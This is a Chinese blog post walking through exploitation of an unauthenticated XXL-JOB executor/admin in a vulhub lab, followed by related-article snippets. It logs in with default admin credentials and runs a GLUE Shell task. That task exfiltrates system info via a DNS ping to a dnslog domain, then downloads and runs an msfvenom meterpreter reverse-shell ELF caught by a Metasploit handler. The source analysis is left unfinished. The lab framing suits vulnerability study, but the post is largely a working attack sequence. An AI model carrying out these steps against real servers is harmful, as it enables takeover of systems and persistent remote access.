xxl-job-执行器-RESTful-API-未授权访问-RCE

最新推荐文章于 2024-09-20 15:38:56 发布
最新推荐文章于 2024-09-20 15:38:56 发布
阅读量2.8k 收藏 4
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41659863/article/details/127492377
版权

1、漏洞描述及范围

描述

在xxl-job 执行器中,GLUE脚本代码,可以直接执行shell命令

范围

2、环境搭建

git clone https://github.com/vulhub/vulhub.git

cd vulhub/xxl-job/unacc/

docker-compose up -d

http://host:8080/xxl-job-admin/toLogin 任务调度中心登录

 

 

admin/123456

http://host:9999

 

3、漏洞利用

实现一键完成结果

判断其主机版本 dnslog 外带

ping -c 1 `uname -a| awk '{print $3}'`.25804b6b.dns.1433.eu.org

http://host:8080/xxl-job-admin/toLogin 任务调度中心登录

admin/123456

任务中心新增

 

运行模式选择  GLUE Shell 

可直接执行shell命令

其余随便填填即可

 

操作编辑 刚刚新增的GLUE IDE

 

uname 版本外带

DNSLOG Platform dnslog 网站生成一个域名

 

ping -c 1 `uname -a| awk '{print $3}'`.5c3d45f9.dns.1433.eu.org

保存执行

 

 

版本外带成功

 

 

msf 生成木马,维权

生成木马 linux 32位 

回连目标 <lhost >

回连端口 28081

 

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<lhost > LPORT=28081 -f elf > shell.elf
 

 

 

 
 

 

 

shell.elf 
 

python3 -m http.server 8888  #开启8888端口共享
 

 

 

 

msf
 

msfconsole
 

 

 

use exploit/multi/handler 
set payload  linux/x86/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 28081
exploit



 

 

 

 
 

 

 

下载添加执行
 

 

 

wget http://host:8888/shell.elf 
chmod +x shell.elf
./shell.elf
 

 

将上面语句添加到命令执行的地方,和之前的uname 外带一致
 

 

 

 
 

 

 

 

 

然后保存执行
 

 

 

 

 
 

 
 

看到已经上线
 

 

 

 

4、源代码分析
 

 search  -f xxl-job* 搜索源码
 

 

 

 
 

 

下载 xxl-job-executor-sample-springboot-2.2.0.jar
 

download /usr/src/xxl-job-executor-sample-springboot-2.2.0.jar
 

 

 
 

 

下载到了 /root 目录下,下载到本地
 

 

 

没看懂
 

 


                

        

        

    

  


    

      

        

            

              
                
                  qq_41659863
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
XXL-JOB executor 授权访问漏洞复现

				
			

			

				

					m0_53603468的博客
				

				

					12-25
					
					2951
					
				

			

		

		

			
				
概述
XXL-JOB executor 授权访问漏洞

XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,授权的攻击者可以通过RESTful API执行任意命令。
不过XXL-JOB官方版本原生自带了鉴权组件,开启后可保障系统底层通讯安全。因此,正常情况下调度中心与执行器底层通讯是安全

			
		

	



                

            
              



	

		

			

				
					
当下的网络安全行业前景到底怎么样?还能否入行?

				
			

			

				

					2201_75735270的博客
				

				

					11-16
					
					135
					
				

			

		

		

			
				
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。

			
		

	



              


  
              

                


	

		

			

				
					
XXL-JOB 漏洞大全

					
最新发布

				
			

			

				

					yggcwhat
				

				

					09-20
					
					1117
					
				

			

		

		

			
				
XXL-JOB 漏洞大全

			
		

	





	

		

			

				
					
xxl-job 执行器 RESTful API 授权访问 RCE

				
			

			

				

					公众号shadow sock7
				

				

					11-10
					
					1851
					
				

			

		

		

			
				
参考:

https://www.buaq.net/go-43356.html
https://github.com/jas502n/xxl-job
https://landgrey.me/blog/18/

环境搭建

下载源码
git clone https://github.com/xuxueli/xxl-job.git
打开文件
xxl-job/xxl-job-executor-samples/xxl-job-executor-sample-springboot/src/main/resources

			
		

	



		

			
		



	

		

			

				
					
weblogic生效js_XXLjob 执行器 RESTful API 授权访问RCE

				
			

			

				

					weixin_39704066的博客
				

				

					12-12
					
					388
					
				

			

		

		

			
				
漏洞复现看到发漏洞公告是 RESTful API 授权,去官网搜了一下使用手册,总共有两种 RESTful API,一个 调度中心 RESTful API,一个 执行器 RESTful API。测试了一下,发现问题出现在执行器 RESTful API。其中有个触发任务执行的说明:说明:触发任务执行------地址格式:{执行器内嵌服务跟地址}/runHeader:    XXL-JOB...

			
		

	





	

		

			

				
					
【漏洞库】XXL-JOB executor 授权访问漏洞导致RCE

				
			

			

				

					yuan_boss的博客
				

				

					11-03
					
					1149
					
				

			

		

		

			
				
XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。注意,我们编写的EXP只能用一次,如果第二次用其他命令就无法命令执行了,除非目标的服务重启,我们才能执行其他的命令,不然只能一直使用第一次用的EXP。该问题类似于将一台Mysql、Redis实例,不设置密码并开放给公网,严格来说不能因此说Mysql、Redis有漏洞,只需要设置密码即可。复现环境与复现参考链接:https://vulhub.org/#/environments/xxl-job/unacc/

			
		

	





	

		

			

				
					
xxl-job的管理在代码中实现,新增,编辑,执行等操作

				
			

			

				

					02-05
				

			

		

		

			
				
XXL-Job是一款分布式任务调度平台,主要由调度中心(XXL-JOB-ADMIN)和执行器XXL-JOB-EXECUTOR)两部分组成。它支持多种调度触发方式,如定时、依赖、手动等,并提供了丰富的API接口,使得开发者可以方便地在代码...

			
		

	





	

		

			

				
					
xxl-job-springboot_xxl-job_

				
			

			

				

					10-03
				

			

		

		

			
				
通常需要添加XXL-Job的相关依赖,并配置相应的调度和执行器地址,以便让SpringBoot应用成为XXL-Job的执行节点。  3. **源代码分析**  压缩包中的`xxl-job-springboot`可能包含了一个示例或者模板项目,该项目演示了...

			
		

	





	

		

			

				
					
xxl-job实战源码

				
			

			

				

					03-24
				

			

		

		

			
				
 - RESTful API:调度中心与执行器之间的通信基于HTTP,使用RESTful API进行任务调度和状态同步。  3. **数据存储**  - MySQL存储:任务信息、调度日志等数据存储在MySQL数据库中,便于查询和管理。  4. **消息队列*...

			
		

	





	

		

			

				
					
xxl-job:xxl-job二次开发   定时任务,增加API接口添加任务、删除任务等操作

				
			

			

				

					05-16
				

			

		

		

			
				
XXL-JOB是一个轻量级分布式任务调度框架,其核心设计目标是开发Swift、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。 Documentation 二次开发内容 1、数据库连接池修改为druid 2、...

			
		

	





	

		

			

				
					
xxl-job-2.3.1

				
			

			

				

					06-19
				

			

		

		

			
				
XXL-JOB是一个分布式任务调度平台,主要由调度中心(XXL-JOB-SCHEDULER)和执行器XXL-JOB-EXECUTOR)两部分组成。版本2.3.1是该平台的一个稳定版本,提供了丰富的功能和优化,旨在帮助开发者实现简单、高效且可...

			
		

	





	

		

			

				
					
xxl-job授权命令执行

				
			

			

				

					weixin_44508748的博客
				

				

					12-14
					
					1000
					
				

			

		

		

			
				
https://vulhub.org/#/environments/xxl-job/unacc/
8080端口:管理端
9999端口:客户端


poc:
POST /run HTTP/1.1 
Host: 10.0.128.46:9999 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 
Accept: text/html,application/xhtml+xml,ap

			
		

	





	

		

			

				
					
探索XXL-JOB-RCE:一款强大的远程代码执行工具

				
			

			

				

					gitblog_00074的博客
				

				

					04-02
					
					906
					
				

			

		

		

			
				
探索XXL-JOB-RCE:一款强大的远程代码执行工具
去发现同类优质开源项目:https://gitcode.com/
项目简介
XXL-JOB-RCE 是一个针对 XXL-JOB 远程命令执行漏洞的利用工具。XXL-JOB 是一个轻量级分布式任务调度平台,广泛用于企业中进行定时任务的管理和执行。然而,XXL-JOB 在某些版本存在安全缺陷,允许攻击者通过精心构造的请求在服务器上执行任意代码。
...

			
		

	





	

		

			

				
					
xxl-job弱口令登录后台RCE复现渗透测试

				
			

			

				

					kelenwait的博客
				

				

					06-27
					
					4420
					
				

			

		

		

			
				
简介
XXL-JOB是一个轻量级分布式任务调度平台,使用JAVA语言研发,使用其可以轻松的实现分布式任务调度,任务管理、执行、监控等功能,在国内颇受欢迎,目前已有多家公司接入xxl-job。
任务官方地址中文版:http://www.xuxueli.com/xxl-job
漏洞影响
xxl-job 全版本,获取后台权限可以管理所有的任务管理,甚至可以执行指令,接管服务器。
漏洞复现
1.登录界面如下使用弱口令登录系统 admin/123456

2.选择 任务管理 - 新增 填写以下信息 运行模式使用 GL

			
		

	





	

		

			

				
					
【漏洞库】XXL-JOB 默认accessToken权限绕过导致RCE

				
			

			

				

					yuan_boss的博客
				

				

					11-03
					
					2855
					
				

			

		

		

			
				
在这个靶场环境中,我只能执行获得反弹shell的EXP,如果是ping一个dnslog域名,或者是创建一个目录,都是无法成功的,有时候反弹shell也不可以,但是可以创建目录,不知道为啥,可能有点玄学吧!在经过对靶场环境的多次重启试验之后,我发现我们编写的EXP只能用一次,如果第二次用其他命令就无法命令执行了,除非将靶场环境重启,我们才能执行其他的命令,不然只能一直使用第一次用的EXP。漏洞复现详细参考链接:https://mp.weixin.qq.com/s/JEpiUndGLe–ufLq0NR0_Q。

			
		

	





	

		

			

				
					
漏洞复现----21、XXL-JOB executor 授权访问漏洞

				
			

			

				

					七天
				

				

					07-23
					
					3019
					
				

			

		

		

			
				
文章目录一、漏洞简介二、漏洞环境三、漏洞分析四、漏洞复现


一、漏洞简介
XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,授权的攻击者可以通过RESTful API执行任意命令。

二、漏洞环境
docker-compose up -d 
访问:
http://ip:8080即可查看

			
		

	





	

		

			

				
					
XXL-JOB源码解析:2.控制器与执行器RESTful api实现浅谈

				
			

			

				

					whq789456的博客
				

				

					11-19
					
					2530
					
				

			

		

		

			
				
xxl-job的git markdown文档中详细介绍了xxl-job中包含的RESTful api的功能以及应用场景。详细内容如下:

doc/XXL-JOB官方文档.md · 许雪里/xxl-job - Gitee.comhttps://gitee.com/xuxueli0323/xxl-job/blob/master/doc/XXL-JOB%E5%AE%98%E6%96%B9%E6%96%87%E6%A1%A3.md#61-%E8%B0%83%E5%BA%A6%E4%B8%AD%E5%...

			
		

	





	

		

			

				
					
浅析xxl-obj分布式任务调度平台RCE漏洞

				
			

			

				

					道阻且长,行则将至。
				

				

					12-29
					
					3883
					
				

			

		

		

			
				
XXL-JOB 任务调度中心系统这几年被披露出存在多个后台命令执行漏洞,攻击者可以通过反弹 shell 执行任意命令,获取服务器管理权限。本文来分析、总结下 XXL-JOB 系统历史上几个 RCE 漏洞,为攻防工作积累 RCE 高危漏洞知识库。

			
		

	





	

		

			

				
					
xxl-jobRCE授权远程命令执行分析+POC测试

				
			

			

				

					Delphinidae
				

				

					11-05
					
					5900
					
				

			

		

		

			
				
xxl-job】远程命令执行漏洞
【参考地址】https://github.com/mrknow001/xxl-job-rce
【实际测试】指纹收集,指纹信息是respose 返回如下的可以试试
{“msg”:“invalid request, HttpMethod not support.”}


指纹收集:fofa,shodan
ps: 只用于问题验证测试,禁止进行非法活动

...

			
		

	





	

		

			

				
					
XXL-JOB 2.3.0定时任务框架发布

				
			

			

				

					
				

			

		

		

			
				
在本资源中,XXL-JOB的版本为2.3.0,以ZIP格式打包提供,说明文件并提供详细的介绍信息,但根据标签和文件名我们可以推断出,该资源包含有关XXL-JOB定时任务的软件文件。"  XXL-JOB是一款开源的任务调度框架,由许...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值